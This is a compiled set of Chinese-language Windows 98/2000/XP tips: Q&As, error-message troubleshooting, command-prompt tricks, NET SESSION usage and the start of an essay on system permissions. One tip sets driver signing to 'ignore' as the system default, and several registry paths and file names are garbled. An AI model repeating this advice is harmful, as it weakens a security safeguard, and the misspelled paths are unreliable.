    问：我使用的是Windows XP/2000双系统，由于电脑配置过低，经常打开一些有AVI等视频文件的文件夹时，电脑速度就很慢，所以一直想把系统的媒体文件预览功能去掉，有办法禁止它吗？

    答：Windows XP中视频文件的预览文件“shmedia.dll”起着决定性的作用，主要关闭该动态链接文件就可以了。在“开始→运行”中输入“regsvr32 /u shmedia.dll”回车，出现“shmedia.dll中的DllUnregisterServer成功”的对话框就说明成功禁止预览功能了。如果想恢复它时，输入“regsvr32 shmedia.dll”即可。Windows 2000中禁止的话，打开要禁止预览的文件夹，右键单击空白处，选择“自定义文件夹”，会出现自定义文件夹向导，其中有一个“请选择模板”项，选择其中的“简易”就可以禁止预览了。

    ★在输入法列表中添加五笔

    问：我在Windows 2000中安装了万能五笔，但却没有自动添加到输入法列表中，每次使用都必须在开始菜单中启动。怎么才能添加到右下角的输入列表中呢？

    答：安装完万能五笔后，在输入法图标上点“右键→属性”，弹出输入法设置窗口，选择“添加”，拖动滑动条找到万能五笔后点确定就可以了。这种方法也不是一定可以解决问题，有的则在列表中找不到万能五笔。所以建议你使用Office 2000自带的五笔输入法，在第一张盘的Msime目录中可以找到。

    ★如何整理磁盘分区

    问：我安装的是Windows 98/XP双系统，我听说在Windows XP下整理磁盘碎片比较快，但是还听说好像整理的不是很彻底，请问我应该在Windows 98下进行硬盘整理好呢？还是在Windows XP下安装好？

    答：我建议你最好是在Windows 98系统下对其所在分区进行整理，在Windows XP下对其所在分区进行整理。因为每个系统的碎片整理程序都是 根据这个系统的实际需要量身定做的。如果你在Windows 98下对Windows XP的系统分区进行了整理，可能会造成Windows XP的相关文件混乱或被破坏，导致Windows XP系统不正常。所以还是最好不要跨系统进行碎片整理。

  ★启动IIS报错

    问：我在手工启动IIS的时候，出现错误提示框，说“地址被占用，启动失败！”请问这如何解决呀？

    答：试着重新安装一遍IIS，看能否能正常。如果还不行，估计你安装了别的服务器软件，如Apache等，如果电脑中安装了这些软件并一直运行 ，那么IIS启动时就会出现地址被占用的提示。

你必须把其他服务软件停止或删除掉，IIS才可以运行。

    ★Chkdsk工具的使用

    问：我使用的是Windows XP操作系统，最近开机在任务栏上总是出现提示说“Winlogon．exe损坏文件，文件或目录＼Winodws＼Debug＼UserMode＼userenv．log已损坏且无法读取。请运行Chkdsk工具。”请问我如何按这个提示运行Chkdsk工具啊？

    答：Chkdsk是系统检查磁盘当前状态的一个命令，启动它可以显示磁盘状态、内存状态和指定路径下指定文件的不连续数目。选择“开始→运行”输入“Chkdsk”回车，即可启动Chkdsk，它会自动校验文件并将丢失的链接转换成文件。

    ★删除MSN的多余账户

    问：由于很多人在同一台电脑上使用MSN Messenger，所以MSN账户登录窗口中的E－mail地址有很多，那么请问在MSN Messenger中如何删除多余的账号啊？

    答：这样来删除，进入“控制面板→用户账户”，选择你登录系统所使用的账户，然后在相关任务栏目下选择“管理我的网络密码”，这时会弹出一个“存储用户名和密码”对话框，这个对话框中保留着登录MSN的所有账户，选择需要删除的，单击“删除”即可。

    ★关闭休眠功能

    问：经常听朋友说，启用休眠功能很浪费硬盘空间，可是我从来都不用休眠功能，怎么知道自己的机子是否使用了休眠功能，又怎么取消休眠功能呢？

    答：查看自己的系统是否打开了休眠功能，只要按以下方法查看即可：在控制面板窗口中双击“电源选项”图标，在打开的窗口中选择“休眠”选项，如果选项“启用休眠”被选中说明你的系统当前启用了休眠功能，只要将该选项取消，然后再“应用→确定”即可，这样就释放了你的硬盘空间了。

    ★停用Windows徽标键

    标准Windows键盘上都有一个Windows徽标键（即键盘上带有窗口图案的键），它的作用是和其他键配合完成一些针对Windows的快捷操作，如“Windows徽标键+D”可以立即显示桌面，“Windows徽标键+L”可以快速锁定计算机（针对Windows XP）等，为我们使用计算机提供了更为快捷的方法。

    不过，有些用户并不喜欢Windows徽标键，那么你可以通过修改注册表来停用Windows徽标键：打开注册表编辑器，依次展开 [HKEY_LOCAL_MACHINESystemCurrentControlSetControlKeyboard Layout]分支，然后在右侧窗口中找到或者新建一个名为“Scancode Map”的“REG_BINARY（二进制）”子项，双击该子项，将其键值设置为“00 00 00 00 00 00 00 00 03 00 00 00 00 00 5B E0 00 00 5C E0 00 00 00 00”，退出注册表编辑器，重新启动计算机后你就会发现Windows徽标键已经失去了作用。
  ★让驱动程序签名不再烦人

    在Windows 2000/XP中，通常我们在安装设备的驱动程序时，系统都会检查该驱动程序是否通过了微软的签名认证，如果没有通过，系统就会弹出一个警告对话框，问你是否继续安装驱动程序。

事实上，很多驱动程序本身并没有问题，只是没有通过微软的认证而已。因此这个对话框会浪费我们很多时间。下面我们就动手将这个讨厌的警告框关闭：在桌面上右击“我的电脑”，选择“属性”命令打开“系统属性”对话框，切换到“硬件”选项卡。

    然后单击“驱动程序签名”按钮，接着在弹出的对话框中选择“忽略”项，即“安装软件，不要征求我的同意”，注意应确保“将这个操作作为系统默认值应用”选项前的复选框选中，最后“确定”退出后即可生效。以后我们再安装驱动程序时，就可以快速地完成了，Windows 2000/XP再也不会弹出警告对话框了！

    ★隐藏部分文件扩展名

    在资源管理器中单击“工具→文件夹选项”，可以选择“隐藏已知文件类型的扩展名”将所有文件的扩展名隐藏起来。不过，如果你只想隐藏部分文件扩展名，那还要借助注册表编辑器：单击“开始→运行”，键入“Regedit”后回车，在注册表编辑器中展开[HKEY_CLASSES_ROOT]分支，找到要隐藏的文件扩展名并展开，然后在右侧窗口中新建字符串值“NeverShowExt”，退出注册表编辑器重新启动计算机后，该类型文件的扩展名将会自动隐藏起来。

    ★恢复下载对话框

    问：以前我下载ZIP、EXE、RAR等文件时，浏览器都会提示我是保存还是直接打开，可现在只要一单击它就自动开始下载到临时文件夹，然后用ZIP或者RAR的软件直接打开了！没有选择的余地，请问如何恢复以前那种“另存为”对话框啊？

    答：很多人取消了对话框上的“在打开这种类型的文件前始终询问”复选框，造成了“另存为”对话框的消失。这时只要你改变一下与当时下载文件类型的默认操作方式就可以恢复了。

    下面以RAR文件为例介绍一下恢复该默认操作方式的步骤。首先打开“我的电脑”，选择“工具→文件夹选项→文件类型”，然后在“已注册的文件类型”列表中找到RAR文件的项目，选中该项目，并且单击“编辑”按钮，注意下方四个复选框中的“下载后确认打开”，选中该复选框并单击“确认”退出。此后，你再次下载Zip文件时，浏览器将重新显示“文件下载”提示对话框了。


Windows出错信息解析及解决方案

《一键清理系统垃圾》

Windows出错信息解析及解决方案

    注册表错误
    Windows 9x/Me/NT/2000把系统的许多设置都组织起来，放到了注册表中，这样虽然易于管理一些（不用像在DOS和Windows 3.x时面对无穷的.ini文件）。可是同时也带来了这样的问题:如果哪个安装程序的反安装做得不好，很容易在注册表中留下一些垃圾。你留一些、我留一些，随着时间的流逝，安装/删除程序的增加，注册表的体积也在突飞猛进，系统当然也慢慢变慢;更有甚者，有些软件如果破坏了注册表，轻则使你不能使用部分软件，重则系统不能启动，惨……
    当你的系统启动很慢或者你安装/删除了很多软件时，你应该用注册表清理工具来清理一下注册表垃圾了，千万不要等到Windows告诉你“注册表错误” 之类的信息之后，你才手忙脚乱地到处打电话，请教朋友……

    Regcleaner
    发布公司:Jouni Vuorio
    最新版本:4.1a
    下载网址: ftp://ftp.download.com.cn/pub/new_system/RegCleaner.exe
    这是一个注册表清理工具：RegCleaner。它是免费的，不过功能稍嫌单薄，只能清理注册表中多余的注册表项，不能修复错误。
    案例:你用的是Win9x，某一天你发现了再也不能进入Windows，总是显示一些注册表错误之类的信息然后就死机或者重新启动，怎么办呢？
    解决方案:首先想到的第一招应该是——使用Windows注册表备份修复，方法嘛？很简单:
    启动到DOS下，执行Scanreg /restore，在弹出的“Microsoft Registry Checker”窗口中，你可以看到五个文件，文件名分别为rb000.cab、rb002.cab……rb004.cab，找一个时间离现在最近的，选择“Restore”，系统应该可以正常启动了。如果还是不行，可以重新运行Scanreg，选择一个时间稍微再早一点的，再试……
    注意:现在市面上有很多注册表方面的书，通过修改注册表来提升系统性能和个性化设置更是大家都很熟悉的事情，可是要记得一点——备份，强烈建议你在每次修改注册表的时候都将你的注册表备份一次！

    动态链接库出错
    我们大家都知道，DLL是Windows中很重要的一种文件，不过微软开始采用这种动态链接库的时候却没有想到动态链接库也会有同名的时候，这些同名的文件可能是因为版本不同而内容不一样、也可能是完全不相干的两个（只不过名字相同），当同名的这些文件被覆盖之后，引起的后果就是灾难性——或者应用程序无法运行、或者程序老是出错，严重的系统根本无法启动。
    说到这里我们不能不提到VxD错误，VxD是虚拟设备，如果这些文件被替换的话，会导致和上边同样的灾难性后果。
    案例一:我每次启动计算机的时候，总是会出现如下的出错提示，但是按下回车键进入系统过后一切都可以使用，并且系统没有什么异常，这是什么原因？
    解决方案:看你的情形，应该不是因为缺少VxD文件所致，这种情况一般是因为不良的安装程序引起的，当你用它的反安装程序时，相应的文件虽然被删除了，但是却在注册表中留下了些残骸。
    运行注册表编辑器Regedit.exe打开注册表，按下“Ctrl+F”查找相应的文件名，找到以后将该注册表项删除，重新启动，问题应该解决了^_^。
    注意:其实上述情况的发生，还有更可能的一种原因——那就是你采用很强暴的方式删除应用程序（直接将应用程序安装目录删除）时也可能产生这种问题，强烈建议你采用应用程序自带的“反安装程序”来完成应用程序的反安装。

    案例二:在一次狂删软件中我卸载了某个软件，提示说还有c:windowssystemWSock32.dll没删掉。重新启动后与上网有关的所有程序（IE、OE、Netants等）都无法运行，提示说:“系统出错，无法启动文件WSock32.dll。请检查文件，确定出问题的原因。”不知WSock32.dll是windows的什么重要文件，我该怎么解决？
    解决方案:这种问题是典型的Dll文件被覆盖所产生的，从IE、OE等出错，说明是系统文件遭到破坏引起的，同时你也知道了遭破坏的文件WSock32.dll，不妨从Windows安装盘释放一个WSock32.dll到提示目录即可（c:windowssystem下），但是为了保险起见，最好先将原来的WSock32.dll备份。
    注意:要覆盖文件，请一定注意Dll文件或者VxD文件的版本号要和你的Windows匹配，如果你不知道怎么才是匹配，请将你的Windows安装盘放入光驱，然后运行sfc.exe让Windows自动检测被破坏的系统文件吧！
    在Windows光盘上单击右键，选择“查找”，在弹出的“查找”窗口中，填写“包含文字”栏为需要查找的文件名（这里是WSock32.dll），按下“开始查找”，等光盘灯不亮的时候，可以看到在右边的查找到文件窗口中有一个Precopy2.cab（不同的Windows版本文件名也是不同的）。用Winzip将其中的WSock32.dll解压缩到需要的目录，至此大功告成（如果你没有Winzip，也可以使用Windows自带的Extract来释放文件，具体用法这里就不再赘述）。
    注意:Dll和VxD文件很容易出现被覆盖的现象，所以当安装应用程序的时候提示“xxxx 文件将被覆盖，是保留老版本文件还是替换”，你一定要谨慎行事，最好不要替换，这样可以保证已经安装的软件和系统的正常运行。

    程序失去反应
    身在Windows下，某个应用程序失去反应可能是最常见的事情。如果不是在系统启动的时候某个程序失去了反应，你应该首先等待一下，一般会解决大部分问题（这主要是该应用程序正在忙于处理，来不及向系统发去的信号反应，等一段时间就是等应用程序处理完毕，你也不要太性急了……）;还是不行的话，建议你启动一下计算机——Windows过一段时间要重新启动早已经是解决Windows问题屡试不爽的妙诀了……
    不过，要是你在安装某个应用程序、新加设备，而且重新启动之后却发现应用程序失去发应，只怕事情就不是那么简单的了。
    案例:最近，我的电脑遇到了问题，每次一开机，刚刚出现桌面背景，连屏幕下的任务栏还没有就会出现一个对话框，左上角有“mprexe”字样，内容为“该程序执行了非法作，即将关闭，请予供应商联系”有时点关闭后照样能正常启动，有时就停止不动只能重新启动。即使覆盖重装了Win98也不管用。
    解决方案:MPR出错一般是因为用户口令文件出错、服务冲突和正在用户配置文件、硬件冲突、硬件驱动程序出错等等。
    1.用户口令文件出错
    我们可以通过重建用户口令文件来纠正错误。按下“Win+F”打开查找窗口，在“文件名”栏中输入“*.pwl”，按下“开始查找”，在查找到的文件窗口中，将所有文件更名或者删除。重新启动Windows，在出现登录窗口时，重新输入用户名和口令就可以了……
    2.服务/应用程序冲突
    要解决服务和应用程序冲突，你需要以“安全模式”启动计算机。然后将刚才安装的应用程序反安装或者服务禁用，看看是否可以解决问题。
    3.用户配置文件问题
    这可以通过禁止用户配置文件来解决此类错误。
    在“网上邻居”上单击“右键”，选择“属性”，在“访问控制”中选择“共享级访问控制”，确定退出后重新启动。
    4.硬件冲突
    你可以在设备管理器中通过将有问题的硬件禁用来找到硬件冲突。
    打开“控制面板”/“系统”/“设备管理器”，在有黄色惊叹号（或问号）的设备上双击，选择“该设备在当前配置文件中禁用”，重复上述步骤可以找到真正有冲突的硬件，请更换它。
    5.设备驱动程序损坏
    请重新安装该设备的驱动程序。
    注:MPrexe失去反应可能是我们最常遇到的程序失去反应案例，这种案例的情形十分复杂，上述并不能完全包括，如果你的英文够好，请参阅微软的MPrexe问题详尽介绍: http://support.microsoft.com/support/kb/articles/Q178/0/84.asp 。

    Windows NT/2000一般错误
    Windows NT/2000是Windows系列的服务器家族重要成员，稳定性比Win9x有了很大的改进，不过他也并不是不会出错，好在是WinNT/2000的出错信息有详细的记录，我们可以通过“事件查看器”来找到出问题的原因进而找出解决方案。
    我们这里说的一般错误，是指的Windows NT/2000还可以运行，不过会弹出出错信息，那种导致直接当机的问题请参看“Windows NT/2000 STOP错误”。
    案例:我启动Win2000的时候，弹出一个错误窗口“At least one service or driver failed during system startup. Use Event Viewer to examine the event log for details”，请问这种问题该如何解决？
    解决方案:很简单，Windows不是提醒你用“Event Viewer（事件查看器）”来了解一下详情吗？
    打开“事件查看器”，在下图的窗口中，我们可以看到一个前面标有“×”的错误信息，双击查看该出错信息的详细出错信息。
    在弹出的出错信息描述中，我们可以看到是这样描述的“The messenger service terminated with service-specific error 2270.”，记下出错信息2270，现在打开一个命令行窗口，输入“net helpmsg 2270”，现在你应该看到出错信息了。
    “The computer name could not be added as a message alias. The name may already exist on the network. ”
    这说明现在这台电脑的Message Alias（消息别名）已经在网络上注册了（你将收不到用net send MessageAlias Message发过来的短信息了），请另外给本台电脑命名就可以了。

    Windows NT/2000 STOP错误
    Stop错误是Windows NT/2000系列特有的一种错误，和Windows NT/2000普通错误不同的是——出现了该种错误以后，如果电脑继续执行下去，可能会破坏数据，因此Windows NT/2000会显示一条STOP:0x0000000A之类的错误，然后蓝屏，停机……
    案例:我用的是Win2000，可是有一天启动的时候却突然出现了如下图的“STOP:0x0000007B”的蓝屏，然后计算机就停止了反应，请问我该怎么解决这种问题？
    解决方案:碰到这种问题，一般可以按照以下方式解决。
    1.首先使用新版杀毒软件检查计算机上是否有病毒。
    2.如果Windows NT/2000仍然可以启动，请检查“事件查看器”中的信息，以确定导致故障的设备或驱动程序。具体解决步骤请参考上边“Windows NT/2000一般错误”。
    3.如果不能启动计算机，试着用“安全模式”或“最后一次正确的配置”启动计算机，然后删除或禁用新安装的附加程序或驱动程序。如果用“安全模式”启动不了计算机，可以考虑使用修复控制台，修复控制台可以在Console模式下禁用一些服务、重新命名设备驱动程序、检修引导扇区或主引导记录（详细步骤请参考相应资料，这个需要比较专业的知识，这里不便详述）。
    4.拆下新安装的硬件设备（RAM、适配卡、硬盘、调制解调器等等），看看是否可以正常启动（如果你新安装了硬盘导致盘符错位，可是会引起上述问题的）。
    5.确保已经更新了硬件设备的驱动程序，以及系统有最新的BIOS。
    6.运行由计算机制造商提供的系统诊断工具，尤其是内存检查。
    7.检查Microsoft兼容硬件列表（HCL），确保所有的硬件和驱动程序都与Windows 2000兼容。Hcl.txt在Windows 2000 CD-ROM的Support文件夹中，你也可以到微软的网站查看http://www. microsoft.com/hcl/default.asp。
    8.在BIOS中禁用内存缓存。
    9.重新启动计算机，在启动菜单处，按F8进入“高级启动选项”，选择“最后一次正确的配置”。（注:使用“最后一次正确的配置”的方式启动计算机后，计算机的所有设置被重置为最后一次正确启动时的配置。）
    10.如果能够访问Web，请进入 http://www.microsoft.com/ ，单击“Support”/“Search Microsoft.com”，在“Search for:”处，输入“stop”和相应的号码（如出现STOP消息“stop:0x0000007B”，可在此输入“stop:0x0000007B”），按Enter键，（上接70页）
    就可以找出所出现的STOP问题的解决方法。
    注:其实上边的Windows NT/2000一般问题的解决也可以在微软的站点上查找到详尽的帮助信息，出问题的时候你直接的想法应该是去看看微软的技术支持站点——看看他是怎么说的（上边的STOP:0x0000007B错误经查，原来是服务器上新添加了硬盘，但是没有注意到磁盘的主从顺序导致的）。

    Windows的出错信息是难以穷尽的，我上边所列的Windows错误可能也只是管中窥豹，不过我们的用意也不在于要将所有的出错信息列举出来，只是想通过这样的介绍给你一种解决问题的思路，使你在Windows出错的时候不至于手忙脚乱……


Progman 程序管理器(可以运行程序)

《一键清理系统垃圾》

Progman　程序管理器(可以运行程序)

Clipbrd　剪贴板查看程序
Config.txt　自己看
Kodakimg 图片查看程序
Netwatch 网络监视器
Rsrcmtr 资源状况
Scanregw 注册表检查程序
Sndvol32 音量调节
Taskman　当前任务程序(可以运行程序)
Winfile　文件管理器(可以运行程序和文件关联)
Winpopup 网内可发即时信息
Sdfaj　 进入程序菜单


Windows技巧二则

《一键清理系统垃圾》

Windows技巧二则

    1.让“隐藏”文件真正隐藏
    在Windoews“开始”菜单的“运行”中键入“Regedit”，打开“注册表编辑器”。找到“HKEY_LOCAL_MASHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL”分支，在右边的窗口中，找到“CheckedValue”项（如果没有该项，请在空白处右击鼠标，选择“新建”→“DWORD值”，就可以添加“CheckedValue”项了），将其值改为“0”（其默认值为“1”），然后关闭“注册表编辑器”。现在，在“资源管理器”中，单击“查看”→“文件夹选项”→“查看”→“显示所有文件”。你会发现，被设为“隐藏”属性的文件和文件夹都不会显示出来了。（ 辽宁　张立明）
    2.加速重新启动
    在C盘根目录下有一个系统文件：msdod.sys，用“笔记本”打开后，输入以下一行命令：“BootDelay=0”或“BootDelay=1”，这都比默认值要快。（记住：对于系统文件的更改，最好做好备份。）（江苏　樊高华）


Windows任务栏的妙用

《一键清理系统垃圾》

Windows任务栏的妙用

    通常，应用程序的快捷方式图标都在桌面上，但利用在任务栏上建立工具栏的方法，可以为你的操作带来极大的便利。陈述如下，与诸位共享。
    用鼠标右键单击任务栏的空白区域，指向“工具栏”，然后单击“桌面”，所选工具栏（桌面）将出现在任务栏（包含“开始”按钮在内的水平条）上。此时新建工具栏上的图标包含标题和该图标的名称，影响使用和美观，可右击新建工具栏空白处，取消“显示文字”和“显示标题”前的小钩，即可消除标题和图标名称的显示。
    接下来整理工具栏，目的是拖动工具栏右边的竖杠时能够使“我的电脑”、“我的文档”、“IE浏览器”、“回收站”四个图标隐藏起来。按住除“我的电脑”、“我的文档”、“IE浏览器”、“回收站”以外的图标向左逐个拖动，使上述四个图标位于工具栏最右侧，然后拖动工具栏右边的竖杠使“我的电脑”、“我的文档”、“IE浏览器”、“回收站”四个图标隐藏起来。至此，完成了工具栏的设置。
    下面我们来领略一下此工具栏之妙处（主要是“我的电脑”、“我的文档”、“IE浏览器”、“回收站”这四个应用程序，其余快捷方式图标的操作除了把双击改为单击与桌面快捷方式图标的操作相同）：
    文件或文件夹的操作：单击工具栏右侧的“》”图标，在弹出的菜单上选择“我的电脑”，在“我的电脑”之后的层级菜单中，利用拖动或右键菜单即可完成“资源管理器”中的移动、复制、删除、剪切等操作，尤其是控制面板、计划任务等的操作尤为方便快捷（可直接点击其中某项执行）。
    “我的文档”菜单：把一些使用不是很频繁的程序的快捷方式发送到我的文档，如：系统信息、磁盘碎片整理、Windows媒体播放器等。通过“我的文档”菜单即可快速打开应用程序。最近编辑过的文件也可从“我的文档”菜单中找到并打开。
    “IE浏览器”菜单：通过该菜单可直接打开新近浏览过的网页。
    清空回收站：右键单击“回收站”菜单，选择“清空回收站”。
    如何？很方便吧！事实上，有了这样的工具栏，你完全可以把桌面隐藏起来，换上一幅漂亮的墙纸。开始菜单亦极少使用。另外，为了不使任务栏的空间太小，最好关闭快速启动工具栏，方法是右键单击快速启动工具栏空白处，选择：工具栏，去掉“快速启动”菜单前的小钩。


Windows网络命令之NET SESSION小档案

《一键清理系统垃圾》

Windows网络命令之NET SESSION小档案

    NET SESSION 用于列出或中断这个计算机与网络上的其它计算机之间的会话。当不带选项使用本命令时，它会显示当前计算机上所有会话的有关信息。也可以使用 net sessions 或 net sess 运行 net session 。

    命令格式如下:

NET SESSION
[\computername] [/DELETE]

    \computername 列出命名的计算机的会话信息。

    /DELETE 中断本地计算机和计算机名之间的会话，并且关闭计算机上所有为该会话打开的文件。如果省略了计算机名，就会终止所有的会话。

    注意使用 net session 有可能造成数据丢失。在断开会话之前可能需要警告用户。

    当显示会话信息时，信息将以类似下面的格式显示:

    Computer User name Client type Opens Idle time
    ------------------------------------------------------------------------
    \BASSETT CHRISDR Windows 2000 1 00:00:13
    \SHARONCA Administrator DOS LM 2.1 0 01:05:13

    客户端的用户成功连接到服务器后，会话将被记录下来。相同的网络上的两个计算机可以成功会话，且用户具有一个被服务器接受的用户名和密码。客户端的用户在使用服务器资源之前必须与服务器进行一次会话，只有当客户端的用户连接到资源时才建立该会话。客户与服务器之间只有一个会话，但它们与资源之间可能有多个入口点或连接。

    要设置自动断开连接之前会话空闲的时间，请使用 net config server/autodisconnect 命令设置 autodisconnect 功能。自动断开连接对用户是透明的，因为当用户再次访问资源时将自动重新建立会话。

    下面是一些例子:

    要显示本地服务器的会话信息列表:

net session

    要显示计算机名为 Shepherd 的客户端会话信息:

net session \shepherd

    要结束服务器与连接到服务器的客户端的所有会话:

net session /delete


Windows系统命令提示符八大特别技巧

《一键清理系统垃圾》

Windows系统命令提示符八大特别技巧

    相信大部分人已经熟悉了微软的Windows操作界面，然而并不是所有的功能都必须借助它才能实现， 因此即便在Windows 2000与Windows XP里仍然保留了类似DOS的命令窗，当然它们与以往Windows 9x版本下的命令窗口有许多不同，因而也有许多特别的应用技巧，我们不妨一同来看一看。

    点击“开始→程序→附件→命令提示符”或“开始→运行”，再输入“CMD”进入命令即可提示符状态。

    1、巧用自动记忆功能

    命令窗具有命令记忆功能，您在窗口中输入的所有命令行都会被自动记忆下来，通过点击键盘上的上下方向键就可以把刚输入的命令逐一调取出来，类似于DOS中的DOSKEY指令，只不过它把这条指令内置于命令窗口中了。这种记忆功能可以免除您反复输入相同指令的痛苦，对于网络环境的调试尤其有用，可以为您节省大量重复劳动和宝贵时间。

    2、趣味提示符

    你会想象到让你的命令提示符变成当前时间吗？能显示当前Windows XP版本号吗？只要你想就能实现。下面我们就来教大家怎么实现。

    在这里我们借助的是一个prompt的DOS命令，该命令有很多实用的参数，详细参数作用请读者在提示符状态运行prompt/?来查阅。了解了这些参数的作用之后，就可以在安装路径下建立一文件，将其命名为run.bat，该文件夹中的内容为prompt $V$D$G$G。接下来打开注册表编辑器，依次浏览到HKEY_LOCAL_MACHINE＼SOFTWARE＼Microsoft＼Command Processor＼，然后双击右侧的AutoRun键值，将其修改为%systemroot%＼run.bat，保存设置退出。重新打开命令提示符，怎么样是不是有了变化。其实只要你根据prompt的参数就可以自行定义非常丰富的提示符文字。

    3、复制窗口内容

    字符串的拷贝对于命令窗来讲相当有用。但Windows 2000与Windows XP的命令提示符的拷贝方式与以前版本有较大差异，即使二者之间也并不相同，前者是采用标记复制法，而后者则直接采用鼠标右键点击的复制法。具体描述如下：

    在Windows XP里，对于全部内容，您可以直接点击鼠标右键中的“全选”来选定，而对于指定范围的内容，您可以首先点鼠标右键选其中的“标记”项，而后移动鼠标到待复制的命令字符处，拖动鼠标选择该字符串，这些字符串将立刻以反白形式出现在屏幕上，点击鼠标右键或按回车键，再移动到目标位置，右击并选择“粘贴”，这样一个命令字符串就自动拷贝到了指定的位置上。

    在Windows 2000下，由于在命令窗中不支持鼠标右键的菜单(但支持鼠标的拖动选择)，因此它给出了一种更为简洁的方式用天命令字符的复制，首先您必须按住鼠标左键，拖选待复制的命令字符串，它们将以反白形式出现在屏幕上，先点击一下鼠标的右键(即执行复制操作)，将鼠标移到目标位置，然后再次轻点鼠标左键，命令字符就自动粘贴到新的位置上了！

    4、改变窗口特性

    如果您长期在命令提示符下工作还可以自行调节其外观以适应自己的使用习惯，比如对其窗口的标题，颜色等进行个性化设置，经常使用到的相关命令如下：

    a)改变标题：CMD /k TITLE新标题名

    b)改变命令符：CMD /K PROMPT [text](text为新的命令提示符)

    c)改变前景色和背景色：CMD /t:gf(g是指定背景色的十六进制数字，常用的颜色有以下值：0 黑色，1蓝色，2 绿色，3 浅绿色，4红色，5紫色，6黄色，7白色，8灰色，9浅蓝，A浅绿，B浅蓝色，C浅红色，D浅紫色，E浅黄色，F亮白色。

    5、命令窗的快捷键

    在命令窗下有许多好用的快捷键，可以大大加快您的输入和调试速度，而且一些功能还以图形方式提供。

    ESC：清除当前命令行；

    F7：显示命令历史记录，以图形列表窗的形式给出所有曾经输入的命令，并可用上下箭头键选择再次执行该命令。

    F8：搜索命令的历史记录，循环显示所有曾经输入的命令，直到按下回车键为止；

    F9：按编号选择命令，以图形对话框方式要求您输入命令所对应的编号(从0开始)，并将该命令显示在屏幕上；

    Ctrl+H：删除光标左边的一个字符；

    Ctrl+C Ctrl+Break，强行中止命令执行；

    Ctrl+M：表示回车确认键；

    Alt+F7：清除所有曾经输入的命令历史记录；

    Alt+PrintScreen：截取屏幕上当前命令窗里的内容。

    6、好“色”的命令行

    在默认状态下命令行永远是黑底白字，就从这里先开刀。在运行对话框中输入cmd，打开命令提示符，在打开的窗口的标题上右击，在弹出的菜单中选择“属性”，并将打开的窗口切换到“颜色”选项卡，依次选中屏幕文字、屏幕背景选项，并设置相应的颜色，注意当我们更改了设置之后在下方就会实时显示出来，根据这一点我们可以根据自己的喜欢及时作出调整，做好之后保存设置会询问应用属性，选择“保存属性，供以后具有相同标题的窗口使用”，这样就不至于只对当前窗口生效了。

    7、快速选择文件和文件夹

    在命令提示符状态下，我们可以按下Tab键来选择当前目录下面的文件和文件夹，它的选择是按照一定顺序来进行的，按下Shift+Tab组合键还可以进行反方向选择，非常方便。注意，此时我们所选择的文件还包括隐藏文件在内。

    8、保存文件列表信息

    有时候我们需要把硬盘中某目录下的文件列表信息全部打印出来，此时可以采用下面的办法：键入命令DIR>C:＼1.TXT之后回车，这样当前目录的文件列表就会保存到C盘的1.txt文件中。


Windows系统权限

《一键清理系统垃圾》

Windows系统权限

无形的栅栏 完全解析Windows系统权限（1）

    一. 权限的由来

    远方的某个山脚下，有一片被森林包围的草原，草原边上居住着一群以牧羊为生的牧民。草原边缘的森林里，生存着各种动物，包括野狼。

    由于羊群是牧民们的主要生活来源，它们的价值便显得特别珍贵，为了防止羊的跑失和野兽的袭击，每户牧民都用栅栏把自己的羊群圈了起来，只留下一道小门，以便每天傍晚供羊群外出到一定范围的草原上活动，实现了一定规模的保护和管理效果。

    最初，野狼只知道在森林里逮兔子等野生动物生存，没有发现远处草原边上的羊群，因此，在一段时间里实现了彼此和平相处，直到有一天，一只为了追逐兔子而凑巧跑到了森林边缘的狼，用它那灵敏的鼻子嗅到了远处那隐隐约约的烤羊肉香味。

    当晚，突然出现的狼群袭击了草原上大部分牧民饲养的羊，它们完全无视牧民们修筑的仅仅能拦住羊群的矮小栅栏，轻轻一跃便突破了这道防线……虽然闻讯而来的牧民们合作击退了狼群，但是羊群已经遭到了一定的损失。

    事后，牧民们明白了栅栏不是仅仅用来防止羊群逃脱的城墙，各户牧民都在忙着加高加固了栅栏……

    如今使用Windows 2000/XP等操作系统的用户，或多或少都会听说过“权限”(Privilege)这个概念，但是真正理解它的家庭用户，也许并不会太多，那么，什么是“权限”呢?对于一般的用户而言，我们可以把它理解为系统对用户能够执行的功能操作所设立的额外限制，用于进一步约束计算机用户能操作的系统功能和内容访问范围，或者说，权限是指某个特定的用户具有特定的系统资源使用权力。

    掌握了“Ring级别”概念的读者也许会问，在如今盛行的80386保护模式中，处理器不是已经为指令执行做了一个“运行级别”的限制了吗?而且我们也知道，面对用户操作的Ring 3级别相对于系统内核运行的Ring 0级别来说，能直接处理的事务已经被大幅度缩减了，为什么还要对运行在“权限少得可怜”的Ring 3层次上的操作系统人机交互界面上另外建立起一套用于进一步限制用户操作的“权限”概念呢?这是因为，前者针对的是机器能执行的指令代码权限，而后者要针对的对象，是坐在计算机面前的用户。

    对计算机来说，系统执行的代码可能会对它造成危害，因此处理器产生了Ring的概念，把“裸露在外”的一部分用于人机交互的操作界面限制起来，避免它一时头脑发热发出有害指令;而对于操作界面部分而言，用户的每一步操作仍然有可能伤害到它自己和底层系统——尽管它自身已经被禁止执行许多有害代码，但是一些不能禁止的功能却依然在对这层安全体系作出威胁，例如格式化操作、删除修改文件等，这些操作在计算机看来，只是“不严重”的磁盘文件处理功能，然而它忽略了一点，操作系统自身就是驻留在磁盘介质上的文件!因此，为了保护自己，操作系统需要在Ring 3笼子限制的操作界面基础上，再产生一个专门用来限制用户的栅栏，这就是现在我们要讨论的权限，它是为限制用户而存在的，而且限制对每个用户并不是一样的，在这个思想的引导下，有些用户能操作的范围相对大些，有些只能操作属于自己的文件，有些甚至什么也不能做……(图.权限)

    正因为如此，计算机用户才有了分类:管理员、普通用户、受限用户、来宾等……

    还记得古老的Windows 9x和MS-DOS吗?它们仅仅拥有基本的Ring权限保护(实模式的DOS甚至连Ring分级都没有)，在这个系统架构里，所有用户的权力都是一样的，任何人都是管理员，系统没有为环境安全提供一点保障——它连实际有用的登录界面都没有提供，仅仅有个随便按ESC都能正常进入系统并进行任何操作的“伪登录”限制而已。对这样的系统而言，不熟悉电脑的用户经常一不小心就把系统毁掉了，而且病毒木马自然也不会放过如此“松软”的一块蛋糕，在如今这个提倡信息安全的时代里，Windows 9x成了名副其实的鸡肋系统，最终淡出人们的视线，取而代之的是由Windows NT家族发展而来的Windows 2000和Windows XP，此外还有近年来致力向桌面用户发展的Linux系统等，它们才是能够满足这个安全危机时代里个人隐私和数据安全等要求的系统。

